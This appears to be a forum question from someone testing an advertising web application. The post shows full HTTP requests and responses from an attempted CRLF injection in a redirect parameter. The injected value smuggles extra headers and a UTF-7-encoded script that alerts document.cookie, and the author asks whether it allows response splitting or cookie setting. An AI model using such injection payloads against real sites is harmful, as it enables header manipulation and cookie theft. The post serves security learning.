Hello everyone,
I was running a few tests on a website when I came across this:
Request:
GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0
When forwarded, the response looked like this:
HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328
<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>
After a few hours of fiddling about with different parameters I think I found a CLRF injection within “intended_params=format%3Dhtml” parameter which changes the location header and redirection URL:
Request:
GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0
Response:
HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328
<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>
Is this behavior exploitable in anyway? can I use this to set cookie or cause HTTP Split Response?
Thanks in advance.